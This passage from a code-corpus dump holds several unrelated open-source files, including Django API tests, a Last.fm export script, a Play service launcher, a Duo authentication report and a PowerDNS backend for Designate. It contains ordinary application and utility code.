SLAMOperator,
name='SLAM',
init_args={
'min_runtime_us': 1,
'max_runtime_us': 100
})
# Connect operators
graph.connect([camera], [detector, segmentation])
graph.connect([camera, detector], [tracker])
graph.connect([lidar, tracker], [slam])
# Execute graph
graph.execute(FLAGS.framework)
if __name__ == '__main__':
app.run(main)
| 2.078125 | 2 |
backend/apps/volontulo/tests/views/api/offers/test_delete.py | magul/volontulo | 16 | 12773231 | <gh_stars>10-100
"""
.. module:: test_delete
"""
from rest_framework import status
from rest_framework.test import APITestCase
from apps.volontulo.factories import OfferFactory
from apps.volontulo.factories import OrganizationFactory
from apps.volontulo.factories import UserFactory
class TestAdminUserOffersDeleteAPIView(APITestCase):
"""Tests for REST API's delete offer view for admin user."""
def setUp(self):
"""Set up each test."""
super().setUp()
self.client.force_login(UserFactory(
userprofile__is_administrator=True
))
def test_offer_delete_status(self):
"""Test offer's delete status for admin user.
API for now is read-only.
"""
response = self.client.delete(
'/api/offers/{}/'.format(OfferFactory().id)
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TestOrganizationUserOffersDeleteAPIView(APITestCase):
"""Tests for REST API's delete offer view for user with organization."""
def setUp(self):
"""Set up each test."""
super().setUp()
self.organization = OrganizationFactory()
self.client.force_login(UserFactory(
userprofile__organizations=[self.organization]
))
def test_offer_delete_status(self):
"""Test offer's delete status for user with organization.
API for now is read-only.
"""
offer = OfferFactory(organization=self.organization)
response = self.client.delete(
'/api/offers/{}/'.format(offer.id)
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TestRegularUserOffersDeleteAPIView(APITestCase):
"""Tests for REST API's delete offer view for regular user."""
def setUp(self):
"""Set up each test."""
super().setUp()
self.client.force_login(UserFactory())
def test_offer_delete_status(self):
"""Test offer's delete status for regular user.
API for now is read-only.
"""
response = self.client.delete(
'/api/offers/{}/'.format(OfferFactory().id)
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TestAnonymousUserOffersDeleteAPIView(APITestCase):
"""Tests for REST API's delete offer view for anonymous user."""
def test_offer_delete_status(self):
"""Test offer's delete status for anonymous user.
API for now is read-only.
"""
response = self.client.delete(
'/api/offers/{}/'.format(OfferFactory().id)
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
| 2.015625 | 2 |
download.py | delannoy/lastfm-explorer | 0 | 12773232 | #!/usr/bin/env python3
'''
Export lastFM data as JSON files and merge them into a flat pandas.DataFrame.
'''
from __future__ import annotations # [PEP 563 -- Postponed Evaluation of Annotations](https://www.python.org/dev/peps/pep-0563/)
from apiWrapper import Param, getReq
from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV
import logFormat
import datetime, enlighten, json, logging, math, time
def downloadData(param:Param, download:bool=True):
'''Download user data (if {download} is True) to json files, merge them into a flat pandas.DataFrame, and write it to disk.'''
logging.info(f"{param.filePath().name.replace('.','|')}")
if download:
subMethod = param.splitMethod(lower=True)
for f in param.filePath(glob='*json'): f.unlink()
pbarManager = enlighten.get_manager()
with pbarManager.counter(unit='page', leave=False) as pbar:
while param.page <= param.nPages:
fileName = param.filePath(ext=f'.{param.page:04d}.json')
response = getReq(param=param, pbarManager=pbarManager, collapse=False)
param.page = int(response.get(subMethod).get('@attr').get('page'))
param.nPages = int(response.get(subMethod).get('@attr').get('totalPages'))
pbar.total = param.nPages # [tqdm: update total without resetting time elapsed](https://stackoverflow.com/a/58961015/13019084)
pbar.update()
param.filePath().parent.mkdir(exist_ok=True)
with open(file=fileName, mode='w') as jsonF: json.dump(obj=response, fp=jsonF)
param.page += 1
time.sleep(param.sleep)
pbarManager.stop()
DF = loadJSON(param)
df = flattenDF(param=param, DF=DF, writeToDisk=True)
if param.splitMethod() in ['TopArtists','TopAlbums','TopTracks']: writeCSV(param=param, df=df)
def exportScrobbles():
'''Fetch and process user scrobbles for the current year and for any year where exported json files are not present.'''
def earliestScrobbleYear() -> int:
'''Determine the earliest year for the user's scrobbles.'''
lastPage = int(getReq(param=Param(method='user.getInfo')).get('playcount')) - 100 # subtract 100 plays, in case some have "unknown" scrobble dates, i.e. 1970
return getReq(param=Param(method='user.getRecentTracks', lim=1, page=lastPage)).loc[0,'date'].year
param = Param(method='user.getRecentTracks', period='overall')
currentYear = datetime.datetime.now().year
for year in range(earliestScrobbleYear(), currentYear):
paramYear = Param(method='user.getRecentTracks', period=year, fr=f'{year}-01-01 00:00:00', to=f'{year}-12-31 23:59:59')
response = getReq(param=paramYear, collapse=False, limit=1)
numPages = math.ceil(int(response.get('recenttracks').get('@attr').get('total'))/param.lim)
if numPages != len(paramYear.filePath(glob='*json')): downloadData(paramYear, download=True)
else: downloadData(paramYear, download=False)
downloadData(Param(method='user.getRecentTracks', period=currentYear, fr=f'{currentYear}-01-01 00:00:00', to=f'{currentYear}-12-31 23:59:59'))
mergeRecentTracks(param)
def main():
# downloadData(Param(method='user.getTopTracks', period='overall'))
downloadData(Param(method='user.getTopAlbums', period='overall'))
downloadData(Param(method='user.getTopArtists', period='overall'))
exportScrobbles()
if __name__== "__main__":
main()
| 2.6875 | 3 |
servicemanager/service/smplayservice.py | alphagov/service-manager | 0 | 12773233 | <reponame>alphagov/service-manager
#!/usr/bin/env python
import os
import shutil
import zipfile
import stat
import copy
import types
from servicemanager.subprocess import Popen
from ..service.smservice import SmMicroServiceStarter
from smjvmservice import SmJvmService, SmJvmServiceStarter
from ..smfile import force_chdir, force_pushdir, remove_if_exists, remove_folder_if_exists, makedirs_if_not_exists
from ..smnexus import SmNexus
from ..actions.colours import BColors
from servicemanager import subprocess
b = BColors()
class SmPlayServiceStarter(SmJvmServiceStarter):
PLAY_PROCESS_STARTUP_TIMEOUT_SECONDS = 120
def __init__(self, context, service_name, run_from, port, classifier, service_mapping_ports, version, proxy, append_args):
SmMicroServiceStarter.__init__(self, context, service_name, "play", run_from, port, classifier, service_mapping_ports, version, proxy, append_args)
if not self.port:
self.port = self.service_data["defaultPort"]
def _build_extra_params(self):
extra_params = ["-Dhttp.port=%d" % self.port]
extra_params += self.process_arguments()
# Features are so specific - should this be in config?
if self.context.features:
for feature in self.context.features:
extra_params += ["-Dfeature.%s=true" % feature]
service_config_key = "Dev.microservice.services"
if self.context.is_test:
if self.service_data.get("hasMongo", False):
extra_params += ["-DDev.microservice.mongodb.uri=mongodb://localhost:27017/%s-%s" % (self.context.database_name_prefix, self.service_name)]
if self.service_mapping_ports and self.service_data.get("hasServiceMappings", False):
for dependent_service_name in self.service_mapping_ports:
service_config_key_with_prefix = service_config_key
if self.service_name == "FEGOVUK":
service_config_key_with_prefix = "govuk-tax.Dev.services"
extra_params += [
"-D%s.%s.host=localhost" % (service_config_key_with_prefix, dependent_service_name),
"-D%s.%s.port=%d" % (service_config_key_with_prefix, dependent_service_name, self.service_mapping_ports[dependent_service_name])
]
if self.proxy:
proxy_config = self.proxy.split(":")
print "Starting service with proxy, '" + str(self.proxy) + "'"
extra_params += [
"-Dhttp.proxyHost=" + proxy_config[0],
"-Dhttp.proxyPort=" + proxy_config[1]
]
if self.append_args:
if not isinstance(self.append_args, types.ListType):
self.log("WARNING: I was passed a non list for append args of '" + str(self.append_args) + "' I dont know what to do with this")
else:
extra_params += self.append_args
return extra_params
def supports_append_args(self):
return True
def get_start_command(self, run_from):
if run_from == "SOURCE":
source_cmd = copy.copy(self.service_data["sources"]["cmd"])
source_cmd[-1] = source_cmd[-1] + " " + " ".join(self.sbt_extra_params())
return source_cmd
else:
return self.service_data["binary"]["cmd"] + self._build_extra_params()
def start_from_binary(self):
microservice_target_path = self.context.get_microservice_target_path(self.service_name)
force_chdir(microservice_target_path)
if not self.context.offline:
nexus = SmNexus(self.context, self.service_name)
if not self.version:
self.version = nexus.find_latest_version(self.run_from, self.service_data["binary"]["artifact"])
nexus.download_jar_if_necessary(self.run_from, self.version)
unzip_dir = self._unzip_play_application()
parent, _ = os.path.split(unzip_dir)
force_pushdir(parent)
cmd_with_params = self.get_start_command("BINARY")
if os.path.exists(cmd_with_params[0]):
os.chmod(cmd_with_params[0], stat.S_IRWXU)
else:
print b.fail + "ERROR: unable to chmod on non existent file '" + parent + cmd_with_params[0] + "'" + b.endc
makedirs_if_not_exists("logs")
print(cmd_with_params)
with open("logs/stdout.txt", "wb") as out, open("logs/stderr.txt", "wb") as err:
popen_output = Popen(cmd_with_params, env=os.environ.copy(), stdout=out, stderr=err, close_fds=True)
if popen_output.returncode == 1:
print b.fail + "ERROR: could not start '" + self.service_name + "' " + b.endc
return popen_output.pid
def _unzip_play_application(self):
service_data = self.service_data
microservice_zip_path = self.context.application.workspace + service_data["location"] + "/target/"
force_pushdir(microservice_zip_path)
zip_filename = service_data["binary"]["artifact"] + ".zip"
unzipped_dir = SmPlayService.unzipped_dir_path(self.context, service_data["location"])
remove_folder_if_exists(unzipped_dir)
os.makedirs(unzipped_dir)
zipfile.ZipFile(zip_filename, 'r').extractall(unzipped_dir)
folder = os.listdir(unzipped_dir)[0]
target_dir = unzipped_dir + "/" + service_data["binary"]["destinationSubdir"]
shutil.move(unzipped_dir + "/" + folder, target_dir)
return target_dir
def sbt_extra_params(self):
sbt_extra_params = self._build_extra_params()
if "extra_params" in self.service_data["sources"]:
sbt_extra_params += self.service_data["sources"]["extra_params"]
return sbt_extra_params
def start_from_sources(self):
sbt_extra_params = self.sbt_extra_params()
service_data = self.context.service_data(self.service_name)
microservice_path = self.context.application.workspace + service_data["location"]
curr_dir = force_pushdir(microservice_path)
env_copy = os.environ.copy()
env_copy["SBT_EXTRA_PARAMS"] = " ".join(sbt_extra_params) # TODO: not needed i think anymore...
makedirs_if_not_exists("logs")
with open("logs/stdout.txt", "wb") as out, open("logs/stderr.txt", "wb") as err:
process = Popen(self.get_start_command("SOURCE"), env=env_copy, stdout=out, stderr=err, stdin=subprocess.PIPE)
process.stdin.close()
if process.returncode == 1:
print b.fail + "ERROR: could not start '" + self.service_name + "' " + b.endc
return process.pid # Note: This is the parent pid
class SmPlayService(SmJvmService):
@staticmethod
def unzipped_dir_path(context, location):
return context.application.config["playExtractionDir"] + location + "_" + context.instance_id
def __init__(self, context, service_name):
SmJvmService.__init__(self, context, service_name, "play")
self.default_port = self.required_data("defaultPort")
self.healthcheck = self.required_data("healthcheck")
def post_stop(self):
pass
def clean_up(self):
unzip_path = SmPlayService.unzipped_dir_path(self.context, self.service_data["location"])
remove_folder_if_exists(unzip_path)
def get_details_url(self):
return "http://localhost:${port}/admin/details"
def get_port_argument(self):
return "http.port"
def get_running_healthcheck_port(self, process):
return process.extract_integer_argument('-D%s=(\d*)' % self.get_port_argument(), self.default_port)
| 1.914063 | 2 |
plugins/duo_auth/vendor/duo_client_python/examples/report_auths_by_country.py | lukaszlaszuk/insightconnect-plugins | 46 | 12773234 | #!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
import csv
import sys
import duo_client
import json
from six.moves import input
argv_iter = iter(sys.argv[1:])
def get_next_arg(prompt):
try:
return next(argv_iter)
except StopIteration:
return input(prompt)
# Configuration and information about objects to create.
admin_api = duo_client.Admin(
ikey=get_next_arg('Admin API integration key ("DI..."): '),
skey=get_next_arg("integration secret key: "),
host=get_next_arg('API hostname ("api-....duosecurity.com"): '),
)
# Retrieve log info from API:
logs = admin_api.get_authentication_log()
# Count authentications by country:
counts = dict()
for log in logs:
country = log["location"]["country"]
if country != "":
counts[country] = counts.get(country, 0) + 1
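# Note (illustrative sketch, not in the original script): the counting loop
# above is equivalent to
#   collections.Counter(log["location"]["country"] for log in logs
#                       if log["location"]["country"] != "")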
# Print CSV of country, auth count:
auths_descending = sorted(counts.items(), key=lambda kv: kv[1], reverse=True)
reporter = csv.writer(sys.stdout)
print("[+] Report of auth counts by country:")
reporter.writerow(("Country", "Auth Count"))
for row in auths_descending:
reporter.writerow(
[
row[0],
row[1],
]
)
| 2.453125 | 2 |
examples/pow/ex3.py | mcorne/python-by-example | 0 | 12773235 | print(pow(9, 2, 10))
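# Three-argument pow computes (base ** exp) % mod efficiently,
# so pow(9, 2, 10) == (9 ** 2) % 10 == 81 % 10 == 1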
| 2.265625 | 2 |
gram/admin.py | swanapole/insta | 0 | 12773236 | from django.contrib import admin
from .models import Post,Location
# Register your models here.
admin.site.register(Post)
admin.site.register(Location)
| 1.34375 | 1 |
vote/migrations/0021_auto_20201103_1923.py | stustanet/Wahlfang | 21 | 12773237 | <gh_stars>10-100
# Generated by Django 3.1.2 on 2020-11-03 18:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('vote', '0020_election_remind_text_sent'),
]
operations = [
migrations.AlterField(
model_name='session',
name='start_date',
field=models.DateTimeField(blank=True, null=True),
),
]
| 1.421875 | 1 |
rainbowhatwrapper/util/RhDisplayUtil.py | akd001/RPi | 1 | 12773238 | import rainbowhat as rh
def showRhDisplay():
try:
rh.display.show()
except Exception as e:
print str(e)
def clearRhDisplay():
try:
rh.display.clear()
except Exception as e:
print str(e)
def printRhDisplay(stringToPrint):
try:
rh.display.print_str(stringToPrint)
except Exception as e:
print str(e) | 2.5 | 2 |
src/test_utils.py | reinaqu/reportingslroo | 0 | 12773239 | '''
Created on 28 nov. 2021
@author: reinaqu_2
'''
import configurations
import DashboardDataExtraction as datextdash
import PublicationsQuality as pubq
from typing import TypeVar,Callable,Dict,List, Set
K = TypeVar('K')
V = TypeVar('V')
def mostrar_dict(d: Dict[str, Set[str]]):
for k,v in sorted(d.items()):
print (k, '-->', list(v))
def show_quality_bubble_plot(quality_file:str, datadash:datextdash.DashboardDataExtraction):
pub_quality = pubq.PublicationsQuality.of_excel(quality_file, configurations.config_publ)
datadash.set_publications_quality(pub_quality)
print(pub_quality.count_pairs_per_quality_measure)
datadash.create_bubble_quality()
def show_dict_from_multivalued_column(datadash:datextdash.DashboardDataExtraction, column_name: str):
d =datadash.create_dict_from_multivalued_column(column_name)
mostrar_dict(d)
| 2.609375 | 3 |
zci_bio/annotations/cpgavas.py | CroP-BioDiv/zcitools | 0 | 12773240 | from zci_bio.annotations.steps import AnnotationsStep
from common_utils.file_utils import write_fasta # copy_file, link_file
_instructions = """
Open web page http://www.herbalgenomics.org/cpgavas/
Probably one of mirrors:
Mirror 1: Central China : http://172.16.17.32:16019/analyzer/home
Mirror 2: East Coast USA : http://172.16.17.32:16019/analyzer/home (more stable)
For each sequence (fas file) do:
* Upload file: sequence.fas
* Specify project name, species name if needed, and email address for notification.
* Leave other data on default
* Submit job
* When job is finished:
- download Global multi-GenBank file into job directory ({abspath})
- run zcit command: zcit.py finish {step_name}
The paper describing CPGAVAS2 can be found here:
https://academic.oup.com/nar/advance-article/doi/10.1093/nar/gkz345/5486746
"""
def create_cpgavas_data(step_data, sequences_step):
step = AnnotationsStep(sequences_step.project, step_data, remove_data=True)
# Store sequence
for seq_ident in sequences_step.all_sequences():
seq = sequences_step.get_sequence(seq_ident)
seq = seq.replace('N', '')
# ToDo: napraviti mapiranje
write_fasta(step.step_file(seq_ident + '.fas'), [(seq_ident, seq)])
# Store instructions
with open(step.step_file('INSTRUCTIONS.txt'), 'w') as out:
out.write(_instructions.format(abspath=step.absolute_path(), step_name=step_data['step_name']))
#
step.set_sequences(sequences_step.all_sequences())
step.save(completed=False)
return step
def finish_cpgavas_data(step_obj):
prnt("ToDo: ...")
# # Check file named: GeSeqJob-<num>-<num>_GLOBAL_multi-GenBank.gbff
# for f in step_obj.step_files():
# if f.startswith('GeSeqJob') and f.endswith('_GLOBAL_multi-GenBank.gbff'):
# filename = f
# break
# else:
# print("Warning: can't find GeSeq output file!")
# return
# # Leave original file
# # ToDo: repair and filter data???
# # ToDo: inverted_region 126081..1 !!! To_ind > from_ind!!!
# copy_file(step_obj.step_file(filename), step_obj.get_all_annotation_filename())
# step_obj._check_data()
# step_obj.save()
| 2.421875 | 2 |
pychron/updater/branch_view.py | ael-noblegas/pychron | 1 | 12773241 | <gh_stars>1-10
# # ===============================================================================
# # Copyright 2015 <NAME>
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# # ===============================================================================
#
# # ============= enthought library imports =======================
# from __future__ import absolute_import
# from traitsui.api import View, UItem, HGroup, VGroup
# from traitsui.editors import EnumEditor
# from traitsui.handler import Controller
# # ============= standard library imports ========================
# # ============= local library imports ==========================
# from pychron.envisage.icon_button_editor import icon_button_editor
#
#
# class NewBranchView(Controller):
# def traits_view(self):
# v = View(UItem('new_branch_name'),
# title='New Branch Name',
# width=300,
# kind='livemodal',
# buttons=['OK', 'Cancel'])
# return v
#
#
# class ManageBranchView(Controller):
# def traits_view(self):
# v = View(
# VGroup(
# VGroup(HGroup(UItem('branch', editor=EnumEditor(name='all_branches')),
# # icon_button_editor('build_button', 'bricks',
# # tooltip='Build selected branch and set as current application'),
# icon_button_editor('checkout_branch_button', 'bricks',
# tooltip='Checkout selected branch'),
# icon_button_editor('pull_button', 'arrow_down',
# tooltip='Update Branch'),
# show_border=True,
# label='Current Branch'))),
# # VGroup(UItem('edit_branch', editor=EnumEditor(name='branches')),
# # UItem('delete_button', enabled_when='delete_enabled'),
# # show_border=True)),
# title='Manage Branch View',
# buttons=['OK', 'Cancel'])
# return v
#
# # ============= EOF =============================================
| 1.367188 | 1 |
designate/backend/impl_powerdns/__init__.py | melodous/designate | 0 | 12773242 | # Copyright 2012 Hewlett-Packard Development Company, L.P. All Rights Reserved.
# Copyright 2012 Managed I.T.
#
# Author: <NAME> <<EMAIL>>
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import threading
from oslo.config import cfg
from oslo.db import options
from sqlalchemy.sql import select
from designate.openstack.common import excutils
from designate.openstack.common import log as logging
from designate.i18n import _LC
from designate import exceptions
from designate.backend import base
from designate.backend.impl_powerdns import tables
from designate.sqlalchemy import session
from designate.sqlalchemy.expressions import InsertFromSelect
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
TSIG_SUPPORTED_ALGORITHMS = ['hmac-md5']
CONF.register_group(cfg.OptGroup(
name='backend:powerdns', title="Configuration for Powerdns Backend"
))
CONF.register_opts([
cfg.StrOpt('domain-type', default='NATIVE', help='PowerDNS Domain Type'),
cfg.ListOpt('also-notify', default=[], help='List of additional IPs to '
'send NOTIFYs to'),
] + options.database_opts, group='backend:powerdns')
# Override the default DB connection registered above, to avoid name conflicts
# between the Designate and PowerDNS databases.
CONF.set_default('connection', 'sqlite:///$state_path/powerdns.sqlite',
group='backend:powerdns')
def _map_col(keys, col):
return dict([(keys[i], col[i]) for i in range(len(keys))])
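# e.g. _map_col(('id', 'name'), (1, 'example.org')) -> {'id': 1, 'name': 'example.org'}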
class PowerDNSBackend(base.Backend):
__plugin_name__ = 'powerdns'
def __init__(self, *args, **kwargs):
super(PowerDNSBackend, self).__init__(*args, **kwargs)
self.local_store = threading.local()
def start(self):
super(PowerDNSBackend, self).start()
@property
def session(self):
        # NOTE: This uses a thread local store, allowing each greenthread to
        #       have its own session stored correctly. Without this, each
        #       greenthread may end up using a single global session, which
        #       leads to bad things happening.
if not hasattr(self.local_store, 'session'):
self.local_store.session = session.get_session(self.name)
return self.local_store.session
def _create(self, table, values):
query = table.insert()
resultproxy = self.session.execute(query, values)
# Refetch the row, for generated columns etc
query = select([table])\
.where(table.c.id == resultproxy.inserted_primary_key[0])
resultproxy = self.session.execute(query)
return _map_col(query.columns.keys(), resultproxy.fetchone())
def _update(self, table, values, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = table.update()\
.where(id_col == values[id_col.name])\
.values(**values)
resultproxy = self.session.execute(query)
if resultproxy.rowcount != 1:
raise exc_notfound()
# Refetch the row, for generated columns etc
query = select([table])\
.where(id_col == values[id_col.name])
resultproxy = self.session.execute(query)
return _map_col(query.columns.keys(), resultproxy.fetchone())
def _get(self, table, id_, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = select([table])\
.where(id_col == id_)
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
if len(results) != 1:
raise exc_notfound()
# Map col keys to values in result
return _map_col(query.columns.keys(), results[0])
def _delete(self, table, id_, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = table.delete()\
.where(id_col == id_)
resultproxy = self.session.execute(query)
if resultproxy.rowcount != 1:
raise exc_notfound()
# TSIG Key Methods
def create_tsigkey(self, context, tsigkey):
"""Create a TSIG Key"""
if tsigkey['algorithm'] not in TSIG_SUPPORTED_ALGORITHMS:
raise exceptions.NotImplemented('Unsupported algorithm')
values = {
'designate_id': tsigkey['id'],
'name': tsigkey['name'],
'algorithm': tsigkey['algorithm'],
'secret': base64.b64encode(tsigkey['secret'])
}
self._create(tables.tsigkeys, values)
# NOTE(kiall): Prepare and execute query to install this TSIG Key on
# every domain. We use a manual query here since anything
# else would be impossibly slow.
query_select = select([
tables.domains.c.id,
"'TSIG-ALLOW-AXFR'",
"'%s'" % tsigkey['name']]
)
columns = [
tables.domain_metadata.c.domain_id,
tables.domain_metadata.c.kind,
tables.domain_metadata.c.content,
]
query = InsertFromSelect(tables.domain_metadata, query_select,
columns)
# NOTE(kiall): A TX is required for, at the least, SQLite.
self.session.begin()
self.session.execute(query)
self.session.commit()
def update_tsigkey(self, context, tsigkey):
"""Update a TSIG Key"""
values = self._get(
tables.tsigkeys,
tsigkey['id'],
exceptions.TsigKeyNotFound,
id_col=tables.tsigkeys.c.designate_id)
# Store a copy of the original name..
original_name = values['name']
values.update({
'name': tsigkey['name'],
'algorithm': tsigkey['algorithm'],
'secret': base64.b64encode(tsigkey['secret'])
})
self._update(tables.tsigkeys, values,
id_col=tables.tsigkeys.c.designate_id,
exc_notfound=exceptions.TsigKeyNotFound)
# If the name changed, Update the necessary DomainMetadata records
if original_name != tsigkey['name']:
            query = tables.domain_metadata.update()\
                .where(tables.domain_metadata.c.kind == 'TSIG-ALLOW-AXFR')\
                .where(tables.domain_metadata.c.content == original_name)\
                .values(content=tsigkey['name'])
            self.session.execute(query)
def delete_tsigkey(self, context, tsigkey):
"""Delete a TSIG Key"""
try:
# Delete this TSIG Key itself
self._delete(
tables.tsigkeys, tsigkey['id'],
exceptions.TsigKeyNotFound,
id_col=tables.tsigkeys.c.designate_id)
except exceptions.TsigKeyNotFound:
# If the TSIG Key is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a TSIG key which is '
'not present in the backend. ID: %s') %
tsigkey['id'])
return
query = tables.domain_metadata.delete()\
.where(tables.domain_metadata.c.kind == 'TSIG-ALLOW-AXFR')\
.where(tables.domain_metadata.c.content == tsigkey['name'])
self.session.execute(query)
# Domain Methods
def create_domain(self, context, domain):
try:
self.session.begin()
servers = self.central_service.find_servers(self.admin_context)
domain_values = {
'designate_id': domain['id'],
'name': domain['name'].rstrip('.'),
'master': servers[0]['name'].rstrip('.'),
'type': CONF['backend:powerdns'].domain_type,
'account': context.tenant
}
domain_ref = self._create(tables.domains, domain_values)
# Install all TSIG Keys on this domain
query = select([tables.tsigkeys.c.name])
resultproxy = self.session.execute(query)
values = [i for i in resultproxy.fetchall()]
self._update_domainmetadata(domain_ref['id'], 'TSIG-ALLOW-AXFR',
values)
# Install all Also Notify's on this domain
self._update_domainmetadata(domain_ref['id'], 'ALSO-NOTIFY',
CONF['backend:powerdns'].also_notify)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def update_domain(self, context, domain):
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
try:
self.session.begin()
# Update the Records TTLs where necessary
query = tables.records.update()\
.where(tables.records.c.domain_id == domain_ref['id'])
            query = query.where(tables.records.c.inherit_ttl == True)  # noqa
query = query.values(ttl=domain['ttl'])
self.session.execute(query)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def delete_domain(self, context, domain):
try:
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
except exceptions.DomainNotFound:
# If the Domain is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a domain which is '
'not present in the backend. ID: %s') %
domain['id'])
return
self._delete(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
# Ensure the records are deleted
query = tables.records.delete()\
.where(tables.records.c.domain_id == domain_ref['id'])
self.session.execute(query)
# Ensure domainmetadata is deleted
query = tables.domain_metadata.delete()\
.where(tables.domain_metadata.c.domain_id == domain_ref['id'])
self.session.execute(query)
# RecordSet Methods
def create_recordset(self, context, domain, recordset):
try:
self.session.begin(subtransactions=True)
# Create all the records..
for record in recordset.records:
self.create_record(context, domain, recordset, record)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def update_recordset(self, context, domain, recordset):
# TODO(kiall): This is a total kludge. Intended as the simplest
# possible fix for the issue. This needs to be
# re-implemented correctly.
try:
self.session.begin(subtransactions=True)
self.delete_recordset(context, domain, recordset)
self.create_recordset(context, domain, recordset)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def delete_recordset(self, context, domain, recordset):
# Ensure records are deleted
query = tables.records.delete()\
.where(tables.records.c.designate_recordset_id == recordset['id'])
self.session.execute(query)
# Record Methods
def create_record(self, context, domain, recordset, record):
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
content = self._sanitize_content(recordset['type'], record['data'])
ttl = domain['ttl'] if recordset['ttl'] is None else recordset['ttl']
record_values = {
'designate_id': record['id'],
'designate_recordset_id': record['recordset_id'],
'domain_id': domain_ref['id'],
'name': recordset['name'].rstrip('.'),
'type': recordset['type'],
'content': content,
'ttl': ttl,
'inherit_ttl': True if recordset['ttl'] is None else False,
'prio': record['priority'],
'auth': self._is_authoritative(domain, recordset, record)
}
self._create(tables.records, record_values)
def update_record(self, context, domain, recordset, record):
record_ref = self._get_record(record['id'])
content = self._sanitize_content(recordset['type'], record['data'])
ttl = domain['ttl'] if recordset['ttl'] is None else recordset['ttl']
record_ref.update({
'content': content,
'ttl': ttl,
'inherit_ttl': True if recordset['ttl'] is None else False,
'prio': record['priority'],
'auth': self._is_authoritative(domain, recordset, record)
})
self._update(tables.records, record_ref,
exc_notfound=exceptions.RecordNotFound)
def delete_record(self, context, domain, recordset, record):
try:
record_ref = self._get(tables.records, record['id'],
exceptions.RecordNotFound,
id_col=tables.records.c.designate_id)
except exceptions.RecordNotFound:
# If the Record is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a record which is '
'not present in the backend. ID: %s') %
record['id'])
else:
self._delete(tables.records, record_ref['id'],
exceptions.RecordNotFound)
# Internal Methods
def _update_domainmetadata(self, domain_id, kind, values=None,
delete=True):
"""Updates a domain's metadata with new values"""
# Fetch all current metadata of the specified kind
values = values or []
query = select([tables.domain_metadata.c.content])\
.where(tables.domain_metadata.c.domain_id == domain_id)\
.where(tables.domain_metadata.c.kind == kind)
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
for metadata_id, content in results:
if content not in values:
if delete:
LOG.debug('Deleting stale domain metadata: %r' %
([domain_id, kind, content],))
# Delete no longer necessary values
# We should never get a notfound here, so UnknownFailure is
# a reasonable choice.
self._delete(tables.domain_metadata, metadata_id,
exceptions.UnknownFailure)
else:
# Remove pre-existing values from the list of values to insert
values.remove(content)
# Insert new values
for value in values:
LOG.debug('Inserting new domain metadata: %r' %
([domain_id, kind, value],))
self._create(
tables.domain_metadata,
{
"domain_id": domain_id,
"kind": kind,
"content": value
})
def _is_authoritative(self, domain, recordset, record):
# NOTE(kiall): See http://doc.powerdns.com/dnssec-modes.html
if recordset['type'] == 'NS' and recordset['name'] != domain['name']:
return False
else:
return True
def _sanitize_content(self, type, content):
if type in ('CNAME', 'MX', 'SRV', 'NS', 'PTR'):
return content.rstrip('.')
if type in ('TXT', 'SPF'):
return '"%s"' % content.replace('"', '\\"')
return content
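    # Illustrative examples (not in the original source):
    #   _sanitize_content('CNAME', 'example.com.') -> 'example.com'
    #   _sanitize_content('TXT', 'v=spf1 a')       -> '"v=spf1 a"'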
def _get_record(self, record_id=None, domain=None, type_=None):
query = select([tables.records])
if record_id:
query = query.where(tables.records.c.designate_id == record_id)
if type_:
query = query.where(tables.records.c.type == type_)
if domain:
query = query.where(tables.records.c.domain_id == domain['id'])
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
if len(results) < 1:
raise exceptions.RecordNotFound('No record found')
elif len(results) > 1:
raise exceptions.RecordNotFound('Too many records found')
else:
return _map_col(query.columns.keys(), results[0])
| 1.554688 | 2 |
src/util.py | weijinqian0/feature_eda | 6 | 12773243 | <reponame>weijinqian0/feature_eda
import json
import re
import time
import numpy as np
def parse_json(json_str):
return json.loads(json_str)
def write_json(json_path, object):
with open(json_path, 'w') as wf:
wf.write(json.dumps(object))
def read_json(json_path):
with open(json_path, 'r') as rf:
line = rf.readline()
return json.loads(line.strip())
def get_numbers(text):
return re.sub("\D", '', text)
def round(value):
return np.round(value, 3)
